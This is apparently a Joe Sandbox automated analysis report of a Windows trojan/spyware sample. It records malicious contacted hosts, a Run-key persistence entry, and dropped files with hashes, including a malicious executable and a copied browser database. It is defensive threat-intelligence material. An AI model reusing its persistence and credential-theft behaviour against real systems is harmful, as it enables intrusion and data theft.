                      https://duckduckgo.com/chrome_newtabipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drfalse
                        		high
                        https://duckduckgo.com/ac/?q=1x6VE38oK.22.drfalse
                          		high
                          http://nsis.sf.net/NSIS_ErrorPrWP76ejHO.exefalse
                            		high
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drfalse
                              		high
                              https://search.yahoo.com?fr=crmas_sfpfipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drfalse
                                		high
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=1x6VE38oK.22.drfalse
                                  		high
                                  https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drfalse
                                    		high
                                    http://nsis.sf.net/NSIS_ErrorErrorPrWP76ejHO.exefalse
                                      		high
                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=1x6VE38oK.22.drfalse
                                        		high
                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          195.110.124.133
                                          		inhomeyoga.comItaly
                                          		39729REGISTER-ASITtrue
                                          50.87.143.200
                                          		t4yfrance.comUnited States
                                          		46606UNIFIEDLAYER-AS-1UStrue
                                          194.58.112.174
                                          		www.a8-group.comRussian Federation
                                          		197695AS-REGRUtrue
                                          81.88.48.71
                                          		fedefarmatour.onlineItaly
                                          		39729REGISTER-ASITtrue

                                          General Information

                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                          Analysis ID:756343
                                          Start date and time:2022-11-30 02:20:08 +01:00
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 8m 42s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:PrWP76ejHO.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:24
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@14/14@4/4
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:
                                          • Successful, ratio: 73.7% (good quality ratio 68%)
                                          • Quality average: 75.2%
                                          • Quality standard deviation: 30.6%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • TCP Packets have been reduced to 100
                                          • Excluded IPs from analysis (whitelisted): 93.184.221.240, 20.42.73.29
                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          02:21:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run oipsxnj C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca
                                          02:21:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run oipsxnj C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca
                                          02:21:30API Interceptor2x Sleep call for process: WerFault.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          No context

                                          Domains

                                          No context

                                          ASNs

                                          No context

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_iijhlev.exe_1f8fea7f532b19688b19ecb27f0cb421e50658_51a01df6_09cfc527\Report.wer

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.8041050886194944
                                          Encrypted:false
                                          SSDEEP:192:TAudawvDwZHBUZMX/g3jR9T/u7s3S274ItDdB:DdawvDwJBUZMX/g3jv/u7s3X4ItDdB
                                          MD5:D3E58825370A9CACD63AA4E4D610D741
                                          SHA1:F7A585CCB546E6A648498538B0605EC204FBC0EE
                                          SHA-256:1651821B53A4F9DD251C1953C1B72AE0B4011ACEAA488539FF2BD106CFE0394A
                                          SHA-512:4C47F499D4DBADF7049BFDB92E98D28F5AC21AB5642AE97A7BDD970E62ADDD10CBB1F0912516FE228DAB5C2919AD3ED84F365EFE44EDC8CD4C96FF4746ACC3A5
                                          Malicious:false
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.4.2.7.7.2.8.3.6.6.0.3.4.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.4.2.7.7.2.8.4.7.0.6.9.0.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.e.4.3.d.1.d.-.a.0.0.a.-.4.9.2.c.-.8.0.4.3.-.0.c.f.a.d.e.7.3.8.9.0.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.f.5.4.c.f.b.-.c.9.a.e.-.4.9.7.d.-.a.9.f.e.-.3.d.a.6.2.5.3.c.3.4.9.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.i.i.j.h.l.e.v...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.0.0.-.0.0.0.1.-.0.0.1.f.-.7.e.3.f.-.0.1.7.e.a.5.0.4.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.c.0.1.a.e.c.9.d.6.e.6.9.2.4.d.f.0.0.f.a.0.b.5.8.5.4.e.1.e.d.4.0.0.0.0.f.f.f.f.!.0.0.0.0.a.5.e.4.8.2.5.9.7.f.6.f.2.d.6.8.2.5.0.a.4.e.b.2.8.9.1.1.6.8.3.e.5.0.f.a.c.4.d.e.!.i.i.j.h.l.e.v...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.

                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_iijhlev.exe_1f8fea7f532b19688b19ecb27f0cb421e50658_51a01df6_13a3c518\Report.wer

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.8114076405556345
                                          Encrypted:false
                                          SSDEEP:192:dy7awvTwZHBUZMX/g3jBR//u7s3S274ItDdBf:M7awvTwJBUZMX/g3j//u7s3X4ItDdB
                                          MD5:881007555D6141EE38396F9FA7BF3A14
                                          SHA1:CDC7784DF7C4DD49A3EF5ABB10B752D256B78EB6
                                          SHA-256:D7B254489920F804CF2FD39544563BE82347DADDA6984681709E507ED9724D4C
                                          SHA-512:1BB3A11587A8959C82FC524F7050ADA653B4E01D96D1F2918DE8E00304AD8B1FCD0CAD359526C0B839E4B65340EF861DC84AB0A385B44A81745F8454EE74E11E
                                          Malicious:false
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.4.2.7.7.2.8.0.1.9.7.3.1.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.4.2.7.7.2.8.2.0.5.6.6.7.6.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.0.3.a.b.f.4.-.2.7.f.6.-.4.3.9.a.-.9.b.7.b.-.4.a.5.8.e.e.9.c.f.d.6.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.3.1.b.8.7.4.-.7.1.a.3.-.4.2.d.b.-.b.b.f.3.-.d.d.8.0.2.a.4.0.6.b.b.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.i.i.j.h.l.e.v...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.7.4.-.0.0.0.1.-.0.0.1.f.-.f.b.7.7.-.0.a.7.9.a.5.0.4.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.c.0.1.a.e.c.9.d.6.e.6.9.2.4.d.f.0.0.f.a.0.b.5.8.5.4.e.1.e.d.4.0.0.0.0.f.f.f.f.!.0.0.0.0.a.5.e.4.8.2.5.9.7.f.6.f.2.d.6.8.2.5.0.a.4.e.b.2.8.9.1.1.6.8.3.e.5.0.f.a.c.4.d.e.!.i.i.j.h.l.e.v...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E08.tmp.dmp

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Wed Nov 30 10:21:21 2022, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):36978
                                          Entropy (8bit):2.094980958939099
                                          Encrypted:false
                                          SSDEEP:192:cPS9WAJmJotO9UHWmUcGk7XPzEJWjSi0XDS6FbzcZc:ITqmmg9UpGyh+XP
                                          MD5:2D96E5A0275FABD6DC46BA6A86F9ABE5
                                          SHA1:3837483602ED6BBC97307DC18ECE9169540EBBE2
                                          SHA-256:4C42A3E21ADFDCB82EAC0FFEDB79FBFA7E8BD9BFF72A9311FE18485FB3A0DDC1
                                          SHA-512:B8ADC0B9C406098E590A0BBECCC7AD109436C99955D00E6D56E1DF0A6DB8E401B88F25039E83A3276780CB46A65697350CFDF4357F5C23382F0322F10DFAA8B8
                                          Malicious:false
                                          Preview:MDMP....... ..........c........................................@$..........T.......8...........T...........0...B~..........p...........\....................................................................U...........B..............GenuineIntelW...........T.......t......c............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERA2EB.tmp.WERInternalMetadata.xml

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8324
                                          Entropy (8bit):3.7043995876261486
                                          Encrypted:false
                                          SSDEEP:192:Rrl7r3GLNivC56P+aghd6YqhYSUEPcugmfAqgS+2CprV89bxsGsfBzKm:RrlsNiv862aghd6Y8YSUEkugmfAqgSFU
                                          MD5:FBDCA69F879137AF87609249DF723473
                                          SHA1:2B2A5976AE858D96B32364F6BB0354CA49ACB58C
                                          SHA-256:33F7BC8B7ECA2FF10E04ED46836350C0A1B74F9C45B9DB61816591B5977B1237
                                          SHA-512:81DDE1A21D59565FCA15830D437559C5327D39824573B8573FEC6A7A92414E414F23AEDDCC12D929C0BFF5D16088E6EDBC57A2FCB018ACBD432BA8ADF8814C81
                                          Malicious:false
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.4.6.8.<./.P.i.d.>.......

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERA3E6.tmp.xml

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4588
                                          Entropy (8bit):4.480173772723793
                                          Encrypted:false
                                          SSDEEP:48:cvIwSD8zsqJgtWI9JVWgc8sqYjs8fm8M4J62ZFtE+q8+mjB++Od:uITf4OkgrsqY9JRxEsjc+Od
                                          MD5:4980E483DD65840DE2CF11A7BB98A8E9
                                          SHA1:0305346ED6363F22F7000210E8884CDDD94629D8
                                          SHA-256:21DA4C57570B00D154DD236761AC94C1E7D347BCAD358645CAE3DBDF3A77122D
                                          SHA-512:E58D71FC52CDFEFF1F50E1D2CBCA149C1093670229330B2F5DB88943D4922A2F096CDDE37B261DA3D5CBA8B7EE4ABE559B2311884351BA27ED576F97BBB916BC
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1802612" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB95.tmp.dmp

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Wed Nov 30 10:21:24 2022, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):36510
                                          Entropy (8bit):2.0994747264122124
                                          Encrypted:false
                                          SSDEEP:192:Z5bhE6b5VtOGJNqajSWW6kekyPPzU+sFezyJSbH03F:bhE6bngGnjEe9wFeo
                                          MD5:262A2F0165598CB8C1F089568D15DAC8
                                          SHA1:84BAB5E35242AA585E97DAFC3EFAE51723E8546A
                                          SHA-256:F279E69F1224E8C691922D0B2D94300A1C600BFA8C19CCBF04B9C772CC774CFE
                                          SHA-512:667B3C1CB3B06A470B77FC668C289DEF5A079FF050A3E99720280B07F04D852D6920AFC9B93B22D99F72DDBC7FE9A0CF1ADE7E36E2D812E11974303816F06F47
                                          Malicious:false
                                          Preview:MDMP....... ..........c........................h................#..........T.......8...........T................}...........................................................................................U...........B..............GenuineIntelW...........T..............c............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERADE7.tmp.WERInternalMetadata.xml

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8332
                                          Entropy (8bit):3.702271813703967
                                          Encrypted:false
                                          SSDEEP:192:Rrl7r3GLNiPC36NMCIgRj6YqhdSUmncugmfAqgS+2CprG89bxRcsfmzBm:RrlsNiPi6NMCIkj6Y8dSUmcugmfAqgSQ
                                          MD5:99775E557955AA9043F52F99B06CBFF8
                                          SHA1:8EB88504C9A5828A9E6E48A7B4A2AFF8289E9F55
                                          SHA-256:C05FE079520B71127C0B907EB55C0B959D6E915B6183DC51E5561D91E03E4144
                                          SHA-512:D4A198D5F33EDDF54BBBC10C9FD12855EA394A6DB3A37614CD64638D52AE8028FF20C6046902F56BA5D34B9A3CAA1F32A952CFAA8789F738587639A790F92E61
                                          Malicious:false
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.6.4.<./.P.i.d.>.......

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERAEE2.tmp.xml

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4588
                                          Entropy (8bit):4.478340495331477
                                          Encrypted:false
                                          SSDEEP:48:cvIwSD8zsqJgtWI9JVWgc8sqYjz8fm8M4J62ZFxQ+q8+mDB+++d:uITf4OkgrsqYMJRtQsDc++d
                                          MD5:8C38EA0ACD36EC05355658D475637FF4
                                          SHA1:3485C2B4747A68A67A90331589B86F03B5E20CD5
                                          SHA-256:02F2D88DC261B7B05CF0DA2D91CD419B5FB6F8AF54D5B8B5CA8ED1B58879F860
                                          SHA-512:EB4818785BD72214D2EA8AED23E561A884492F3479AF713A9C4266A3B6E38CC225F8B47B6348249FF43876C1990BBFC113265FF37F25CA0123577F73B9E23B2F
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1802612" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                          C:\Users\user\AppData\Local\Temp\1x6VE38oK

                                          Download File
                                          Process:C:\Windows\SysWOW64\ipconfig.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                          Category:dropped
                                          Size (bytes):94208
                                          Entropy (8bit):1.2882898331044472
                                          Encrypted:false
                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\iscan.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\PrWP76ejHO.exe
                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):125440
                                          Entropy (8bit):6.283809308716995
                                          Encrypted:false
                                          SSDEEP:3072:6sqyHK7EF9cU5FO/hcf9hUnBZFXBultTL6OhiF:BHK7o9W5uhSFXEY
                                          MD5:2B4B3369E04DEDD66517641DB0F5A8AB
                                          SHA1:A5E482597F6F2D68250A4EB28911683E50FAC4DE
                                          SHA-256:A4C4BF78E737CCADBABF71B57E5676A846D9ADFC5442344EDA8267325223B964
                                          SHA-512:67EB46AB147AD92DB741B60F851A78B6BF88F2DA93601542EE67D4FAAD448CECA73938207F5DAEB0153D5D2C1C84A64949CD7856F404C0781C4E9633727354CC
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 27%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..............................2......2......2................v..*......*.t....*......Rich...........PE..L....h.c.................f..........9.............@..........................@.......................................................0.............................. ...............................@...@............................................text....e.......f.................. ..`.rdata...k.......l...j..............@..@.data...(+..........................@....gfids....... ......................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\mmbedbm.jl

                                          Download File
                                          Process:C:\Users\user\Desktop\PrWP76ejHO.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):189952
                                          Entropy (8bit):7.998520046706668
                                          Encrypted:true
                                          SSDEEP:3072:lfffffffffffff01MFDR7elXwjs6LDZf5X2a2GdUbA1CRe7vDIJGc4U9WKoCaAdY:lfffffffffffff3JexZcZV2a2GdPokvx
                                          MD5:AE2C848F5A91F0EEFBCFAECB3660089D
                                          SHA1:A280F4205AABBCADC444FD983207E41A5871784E
                                          SHA-256:72B7C4D8E791EA9A4A34BA3626C1FF4BE294988650E960C7F7ED18CA90847098
                                          SHA-512:66B79443D897DAB52B4D5FF19D790FDCA1C2A070B481C201265988B490770747B83F3888CBC5B2A07ECA8CA1B90008DC33F615126B3F73E419D2484B9B487198
                                          Malicious:false
                                          Preview:._ 5b...[...u....)#.gt..l...M....v.5~aR.A.&n...f..:.]....h9/'.n.^Y.fF.&..L?NZ..... ....P.........YD..ew..%f.......kU..n~..n.....y.e..q.Q/.<...a>..s...........[.0...3.].......S..d..,.,5.(m.O.pn=.x...%..U.:.+`..rs.........W.......{.L.1+...M-..6.p....<.R.V#...@#...P........5.aR.A.&n..f..:.]....h9.'.n._.wf%......%X8.....2J-.ve6..p..r..H..{...Y.*.Q...!fZG..n~..n.P.....%........O.sg~06.PA.q#....d.g....U..E.O......S.&s..,.,.D.m...pq..Z.v..%....tj..T..rs.........WL...j..{.k.%+...M-..6.p...[<.R.V#....#.].P.......v.5~aR.A.&n...f..:.]....h9.'.n._.wf%......%X8.....2J-.ve6..p..r..H..{...Y.*.Q...!fZG..n~..n.P.....%........O.sg~06.PA.q#....d.g....U..E.O......S..d..,.,.E(m.q.pq@.Z...%....tj.+T..rs.........WL...j..{.k.%+...M-..6.p...[<.R.V#....#.].P.......v.5~aR.A.&n...f..:.]....h9.'.n._.wf%......%X8.....2J-.ve6..p..r..H..{...Y.*.Q...!fZG..n~..n.P.....%........O.sg~06.PA.q#....d.g....U..E.O......S..d..,.,.E(m.q.pq@.Z...%....tj.+T..rs......

                                          C:\Users\user\AppData\Local\Temp\nsx4EFE.tmp

                                          Download File
                                          Process:C:\Users\user\Desktop\PrWP76ejHO.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):330372
                                          Entropy (8bit):7.553183899203401
                                          Encrypted:false
                                          SSDEEP:6144:MMifffffffffffff3JexZcZV2a2GdPokvDIJGc4U9HV6Epw5Da3iffuHK7o9W5ui:Mffffffffffffff3YxZa4qokrIIc4Woy
                                          MD5:5D51FD4B6E844AE16602B13E24A93BF8
                                          SHA1:9F071B7B261C17DA0862C4029EB9530A9912EFB1
                                          SHA-256:501989AB0623183D2CA2B4E4BCFC74B8C865A03E55899889B92E7D81957B25E0
                                          SHA-512:6E0279EEADB8E9604FA944A5EB5D4E673F0667E79983C451E0A00B403D28062AA4F2AA60773269DFC3A23AC62F6927743565907A1D8CD33994CB267371F1DF5B
                                          Malicious:false
                                          Preview:........,...................^...$...........................................................................................................................................................................................................................................................J...................j...........................................................................................................................................$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c

                                          Download File
                                          Process:C:\Users\user\Desktop\PrWP76ejHO.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):8152
                                          Entropy (8bit):6.20728143173311
                                          Encrypted:false
                                          SSDEEP:192:tEnLkq8ChRVmucs9kMZk1thk1XRKjR5SeOyrkIBrzG6iyw:4LkqfRVLSMZkVQXWsbUKn
                                          MD5:64C3C26CE45E8C154D7CA9FEBB385997
                                          SHA1:D606B7D8CD6E3046992ED26D869E47AFD2A390AE
                                          SHA-256:A2F81AB67DA82F261E6979CAF0DF1E366499015C6ABABBD1A020601D4FB58185
                                          SHA-512:7A61FAC51B7ABD0D20D7EF06161BD417D120181E67E3CEF891BB6D149B0BA656B0F9229CCE9ED77B00B9CE37A9FB871B355EFF925D904FB4DDE26288370E3AB3
                                          Malicious:false
